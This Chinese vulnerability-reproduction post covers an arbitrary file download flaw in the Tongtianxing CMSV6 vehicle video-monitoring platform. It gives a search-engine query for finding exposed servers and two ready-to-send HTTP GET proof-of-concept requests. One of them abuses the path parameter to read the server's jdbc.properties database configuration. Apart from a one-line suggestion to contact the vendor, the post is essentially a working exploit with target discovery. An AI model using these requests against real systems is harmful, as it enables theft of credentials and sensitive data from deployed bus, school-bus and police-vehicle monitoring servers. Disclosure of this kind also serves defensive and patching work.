【漏洞复现】通天星CMSV6车载监控平台任意文件下载漏洞

深圳市通天星科技有限公司，是一家以从事计算机、通信和其他电子设备制造业为主的企业。通天星车载视频监控平台软件拥有多种语言版本。应用于公交车车载视频监控、校车车载视频监控、大巴车车载视频监控、物流车载监控、油品运输车载监控、警车车载视频监控等公共交通上。

通天星车载视频监控平台软件MobileAction_downLoad.action文件下path参数存在过滤不严格问题，导致攻击者可以恶意读取服务器的任意文件，获取敏感信息。

hunter-query: web.body="/808gps/"

POC1：

GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host: {{Hostname}}
Accept: */*

POC2：

GET /808gps/MobileAction_downLoad.action?path=/client/Map/map.ini HTTP/1.1
Host: {{Hostname}}
Accept: */*

建议联系软件厂商进行处理。

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/news/599703.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！